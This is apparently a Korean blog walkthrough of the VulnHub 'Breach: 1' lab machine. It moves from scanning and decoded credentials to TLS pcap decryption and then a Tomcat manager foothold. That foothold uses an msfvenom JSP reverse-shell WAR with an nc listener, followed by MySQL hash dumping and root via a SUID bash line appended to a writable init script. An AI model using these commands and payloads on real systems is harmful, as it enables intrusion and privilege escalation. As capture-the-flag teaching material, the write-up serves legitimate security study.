https://www.vulnhub.com/entry/breach-1,152/
Breach: 1
This mentions the name of this release, when it was released, who made it, a link to 'series' and a link to the homepage of the release. It's common for an author to release multiple 'scenarios', making up a 'series' of machines to attack.
www.vulnhub.com
이번 주말동안 내부망 모의해킹 홈랩을 준비한다고 kali linux 환경을 VMware Workstation으로 마이그레이션했습니다~
이전에 클라우드 공부할때 VMware 사용을 해봐서 그래도 수월하게 환경 셋팅까지 마무리하고 다시 Breach 부터 실습을 진행합니다
특이사항으로는 이 실습 VM은 192.168.110.140 으로 IP가 고정되어있어서 NAT 네트워크 카드를 192.168.110.0/24 대역대로 바꿔서 실습을 진행해줍니다
Reconnaissance
discovery
└─$ sudo nmap -sn 192.168.110.0/24
Nmap scan report for 192.168.110.140
Host is up (0.00015s latency).
MAC Address: 00:0C:29:17:24:9F (VMware)110.140이 업 상태에 있죠?
nmap -p- --max-retries 1 --min-rate 2000 -Pn -n --open -iL ./scope.txt -oA ./recon/tcpAll
스캐닝을 했는데 전부 다 열려있네요,,,
흔히 많이 사용하는 포트 부터 간단하게 정보 수집해봅니다
# ftp - 21
└─$ ftp 192.168.110.140
Connected to 192.168.110.140.
550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00421 Service not available, remote server has closed connection.
ftp> ls
Not connected.
#smtp - 25
└─$ telnet 192.168.110.140 25
Trying 192.168.110.140...
Connected to 192.168.110.140.
Escape character is '^]'.
550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00Connection closed by foreign host.
# mount
└─$ showmount -e 192.168.110.140
clnt_create: RPC: Unable to receive
# smb - 445
└─$ smbclient -L 192.168.110.140
Protocol negotiation to server 192.168.110.140 (for a protocol between LANMAN1 and SMB3) failed: NT_STATUS_CONNECTION_RESET
딱히 특이사항 없으니 web 정보 수집 진행해봅니다
WEB
페이지 소스 주석 처리된 암호화된 문자
base64 디코딩 진행합니다
└─$ echo 'Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo' | base64 --decode | base64 --decode
pgibbons:damnitfeel$goodtobeagang$ta2단으로 인코딩 되어있었습니다
그리고 intech.html 이라는 하이퍼링크가 보이죠?
그리고 Employee portal에 들어가니 impresscms가 구성되어있습니다
그리고 위에서 얻은 계정 정보로 로그인을 시도하니 성공했습니다 그리고 submit을 눌러 이것 저것 확인해봅니다
뭔가 이용할 만한 취약점을 찾기 위해서 좀 더 정보를 파악해봅니다
Vulnerability
192.168.110.140/.keystore
SSL
└─$ wget http://192.168.110.140/.keystore
--2024-07-22 04:55:41-- http://192.168.110.140/.keystore
Connecting to 192.168.110.140:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2245 (2.2K)
Saving to: ‘.keystore’
.keystore 100%[====================================================================================================>] 2.19K --.-KB/s in 0s
2024-07-22 04:55:41 (383 MB/s) - ‘.keystore’ saved [2245/2245]
└─$ strings .keystore
tomcat
R|(A
q15Y?
]c["y
Yrf!K\
@V e
2j;2>
A@7B
`=aw
]]bOP
Ksh\x
c\q
e@&~
@-C8o
GF-=#sO
*O\F
Qt;6
X.509
Unknown1
Unknown1
Unknown1
Unknown1
Unknown1
Unknown0
160520175107Z
160818175107Z0l1
Unknown1
Unknown1
Unknown1
Unknown1
Unknown1
Unknown0
W1,X
jg&_jp
*EyX,9 p음 ...
이건 아닌거같고,
SSL에 관해서 찾아봅시다
└─$ wget http://192.168.110.140/impresscms/_SSL_test_phase1.pcap
--2024-07-22 04:58:33-- http://192.168.110.140/impresscms/_SSL_test_phase1.pcap
Connecting to 192.168.110.140:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41412 (40K) [application/vnd.tcpdump.pcap]
Saving to: ‘_SSL_test_phase1.pcap’
_SSL_test_phase1.pcap 100%[====================================================================================================>] 40.44K --.-KB/s in 0s
2024-07-22 04:58:33 (200 MB/s) - ‘_SSL_test_phase1.pcap’ saved [41412/41412]
└─$ wireshark _SSL_test_phase1.pcap
대부분 암호화 되어있는데 이것을 풀기 위해서 .keystore를 사용했던 것 같습니다
구글에서 검색해보니 java keytool 이라는 것을 사용해서 암호화 된 것을 복호화 해야합니다
우선 keystore -> PKCS12로 변경 -> 복호화를 진행
└─$ keytool -importkeystore \
> -srckeystore keystore \
> -destkeystore keystore.p12 \
> -deststoretype PKCS12 \
> -srcalias tomcat \
> -deststorepass tomcat \
> -destkeypass tomcat
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Importing keystore keystore to keystore.p12...
Enter source keystore password:
└─$ ls
keystore keystore.p12 recon scope.txt _SSL_test_phase1.pcap
wireshark를 다시 실행 해준다음 Edit -> Preference -> Protocol 에서 TLS를 찾아줍니다
Edit를 눌러 위와 같이 추가해줍니다 이후 다운받았던 pcap 파일을 다시 열어서 확인해보면 아래와 같이 확인이 가능합니다
└─$ echo 'dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC' | base64 --decode
tomcat:Tt\5D8F(#!*u=G)4m7zBbase64로 암호화된 비밀번호 획득 -> 디코딩
얻은 계정 정보로 /_M@nag3Me/html로 접속해봅니다 물론 포트는 8443 이겠죠? 명심하셔야합니다 그리고 앞에 https를 붙여야합니다!
이제 공격을 해야할 때가 왔습니다
이 tomcat 관리자 페이지에 접속을 하면 리버스쉘로 이루어진 war 파일을 업로드하면 리버스쉘을 획득 할 수 있습니다
Exploitation
msfvenom 툴을 이용해서 페이로드를 생성해봅니다
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=7777 -f war -o revshell.war
Payload size: 1098 bytes
Final size of war file: 1098 bytes
Saved as: revshell.war
# reverse shell listening
└─$ nc -nlvp 7777
listening on [any] 7777 ...
/revshell을 클릭해줍니다!
대상 호스트에 초기 침투 완료했습니다
Post-Exploitation
여기저기 찾아보다가 777권한을 가진 디렉터리 /var/www/5446를 발견했고, php 파일에서 데이터베이스에 대한 정보를 획득 했습니다
tomcat6@Breach:/var/www/5446$ cat 0d93f85c5061c44cdffeb8381b2772fd.php
<?php
/**
* All information in order to connect to database are going through here.
*
* Be careful if you are changing data's in this file.
*
* @copyright http://www.xoops.org/ The XOOPS Project
* @copyright XOOPS_copyrights.txt
* @copyright http://www.impresscms.org/ The ImpressCMS Project
* @license http://www.gnu.org/licenses/old-licenses/gpl-2.0.html GNU General Public License (GPL)
* @package installer
* @since 1.0
* @author marcan <marcan@impresscms.org>
* @author Sina Asghari (aka stranger) <pesian_stranger@users.sourceforge.net>
* @version $Id: sdata.dist.php 8570 2009-04-11 13:15:53Z icmsunderdog $
*/
// Database Hostname
// Hostname of the database server. If you are unsure, 'localhost' works in most cases.
define( 'SDATA_DB_HOST', 'localhost' );
// Database Username
// Your database user account on the host
define( 'SDATA_DB_USER', 'root' );
// Database Password
// Password for your database user account
define( 'SDATA_DB_PASS', '' );
// Database Name
// The name of database on the host. The installer will attempt to create the database if not exist
define( 'SDATA_DB_NAME', 'impresscms' );
// Table Prefix
// This prefix will be added to all new tables created to avoid name conflict in the database. If you are unsure, just use the default 'icms'
define( 'SDATA_DB_PREFIX', 'ia44db101' );
// Password Salt Key $mainSalt
// This salt will be appended to passwords in the icms_encryptPass() function.
// Do NOT change this once your site is Live, doing so will invalidate everyones Password.
define( 'SDATA_DB_SALT', 'EQ9eLioElpacrtYZFQrGiDvB5OQGXzq2jfA4okdsZzkVNGhka6blxUTrozLOuFSA4' );비밀번호가 없네요!! 한번 접속해봅니다
?>tomcat6@Breach:/var/www/5446$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 104
Server version: 5.5.49-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| impresscms |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.03 sec)
mysql> use mysql;
mysql> show tables;
mysql> select Host,User,Password from user;
+-----------+------------------+-------------------------------------------+
| Host | User | Password |
+-----------+------------------+-------------------------------------------+
| localhost | root | |
| | milton | 6450d89bd3aff1d893b85d3ad65d2ec2 |
| 127.0.0.1 | root | |
| ::1 | root | |
| localhost | debian-sys-maint | *A9523939F1B2F3E72A4306C34F225ACF09590878 |
+-----------+------------------+-------------------------------------------+
5 rows in set (0.00 sec)milton 발견,,,ㅎㅎ 해시크래킹 시도해봅니다
decrypt 결과
6450d89bd3aff1d893b85d3ad65d2ec2 : thelaststraw
# milton credentials
milton:thelaststraw
Privilege Escalation
milton@Breach:~$ cat some_script.sh
_____ _ _ _ _ _ _
|_ _| | ( ) | | | | (_) | |
| | | |__ ___ _ __ ___|/ ___ _ __ ___ | |_| |__ _ _ __ __ _ | |__ ___ _ __ ___
| | | '_ \ / _ \ '__/ _ \ / __| | '_ \ / _ \| __| '_ \| | '_ \ / _` | | '_ \ / _ \ '__/ _ \
| | | | | | __/ | | __/ \__ \ | | | | (_) | |_| | | | | | | | (_| | | | | | __/ | | __/
\_/ |_| |_|\___|_| \___| |___/ |_| |_|\___/ \__|_| |_|_|_| |_|\__, | |_| |_|\___|_| \___|
__/ |
|___/milton이 속한 그룹에 adm이 포함되어있었습니다
milton@Breach:~$ find / -group adm -type f -ls 2> /dev/null | grep -v '.gz'
530040 0 -rw-r----- 1 mysql adm 0 Jun 7 2016 /var/log/mysql.log
526766 0 -rw-r----- 1 root adm 0 Jun 6 2016 /var/log/apt/term.log
524944 116 -rw-r----- 1 root adm 118463 Jul 22 13:22 /var/log/dmesg
530047 3520 -rw-r----- 1 syslog adm 3597275 Jun 5 2016 /var/log/kern.log.1
530053 32 -rw-r----- 1 mysql adm 24759 Jul 22 13:22 /var/log/mysql/error.log
530048 164 -rw-r----- 1 syslog adm 163180 Jun 6 2016 /var/log/auth.log.1
524835 116 -rw-r----- 1 root adm 118669 Jul 22 13:06 /var/log/dmesg.0
525299 4 -rw-r----- 1 root adm 31 Feb 17 2016 /var/log/fsck/checkroot
525298 4 -rw-r----- 1 root adm 31 Feb 17 2016 /var/log/fsck/checkfs
528284 752 -rw-r----- 1 root adm 767861 Jun 6 2016 /var/log/apache2/other_vhosts_access.log.1
530018 0 -rw-r----- 1 root adm 0 Jun 7 2016 /var/log/apache2/other_vhosts_access.log
530019 3804 -rw-r----- 1 root adm 3890033 Jun 6 2016 /var/log/apache2/access.log.1
526554 14608 -rw-r----- 1 root adm 14955108 Jul 22 13:58 /var/log/apache2/access.log
530042 648 -rw-r----- 1 root adm 659383 Jun 6 2016 /var/log/apache2/error.log.1
526649 8796 -rw-r----- 1 root adm 9001989 Jul 22 13:38 /var/log/apache2/error.log
528194 0 -rw-r----- 1 mysql adm 0 May 24 2016 /var/log/mysql.err
526625 3016 -rw-r----- 1 syslog adm 3084253 Jul 22 13:28 /var/log/kern.log
526622 2660 -rw-r----- 1 syslog adm 2718042 Jul 22 14:57 /var/log/syslog
528197 828 -rw-r----- 1 syslog adm 841429 Jun 7 2016 /var/log/syslog.1
528385 248 -rw-r----- 1 syslog adm 248492 Jul 22 14:57 /var/log/auth.log
.gz 제외하고 /var/log/syslog 확인해봅니다
cron에서 /usr/share/cleanup/tidyup.sh 스크립트가 실행되고있습니다.
milton@Breach:~$ cat /usr/share/cleanup/tidyup.sh
#!/bin/bash
#Hacker Evasion Script
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.
cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf매 3분마다 아래의 스크립트가 실행됩니다. 근데 쓰기 권한이 없어 다른 쓰기 권한이 있는 파일을 찾아야합니다
milton@Breach:~$ find / -writable -type f 2> /dev/null
...
/etc/init.d/portly.sh
...
milton@Breach:~$ ls -al /etc/init.d/portly.sh
-rwxrwxrwx 1 root root 231 Jun 5 2016 /etc/init.d/portly.sh
milton@Breach:~$ cat /etc/init.d/portly.sh
#!/bin/bash
iptables -t nat -A PREROUTING -p tcp --match multiport --dport 1:79,81:8442,8444:65535 -j REDIRECT --to-ports 4444 && /usr/local/bin/portspoof -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures -D리눅스는 시스템 부팅시 /etc/init.d에 있는 모든 것을 실행합니다
milton@Breach:~$ echo "cp /bin/bash /tmp/rootshell; chmod 4777 /tmp/rootshell;" >> /etc/init.d/portly.sh
milton@Breach:~$ cat /etc/init.d/portly.sh
#!/bin/bash
iptables -t nat -A PREROUTING -p tcp --match multiport --dport 1:79,81:8442,8444:65535 -j REDIRECT --to-ports 4444 && /usr/local/bin/portspoof -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures -D
cp /bin/bash /tmp/rootshell; chmod 4777 /tmp/rootshell;한번 재부팅하고 다시 접속해봅니다
rootshell이 root 권한으로 만들어져있습니다
그리고 /bin/bash와 똑같기 때문에 -p를 이용하여 관리자 권한을 획득했습니다
rootshell-4.3# cat .flag.txt
cat .flag.txt
-----------------------------------------------------------------------------------
______ _ __ _____ _____ _ _____ _
| ___ \ | | / | | _ | |_ _| | | ___| | |
| |_/ /_ __ ___ __ _ ___| |__ `| | | |/' |______| | | |__ ___| |__ _ __ __| |
| ___ \ '__/ _ \/ _` |/ __| '_ \ | | | /| |______| | | '_ \ / _ \ __| '_ \ / _` |
| |_/ / | | __/ (_| | (__| | | || |_\ |_/ / | | | | | | __/ |__| | | | (_| |
\____/|_| \___|\__,_|\___|_| |_\___(_)___/ \_/ |_| |_|\___\____/_| |_|\__,_|
-----------------------------------------------------------------------------------
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!
Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.
'Vulnhub' 카테고리의 다른 글
| [Vulnhub] NullByte Walkthrough (3) | 2024.07.24 |
|---|---|
| [Vulnhub] Breach: 2 Walkthrough (4) | 2024.07.23 |
| [Vulnhub] Tommy Boy Walkthrough (4) | 2024.07.17 |
| [Vulnhub] RickdiculouslyEasy Walkthrough (1) | 2024.07.16 |
| [Vulnhub] DerpNStink Walkthrough (1) | 2024.07.15 |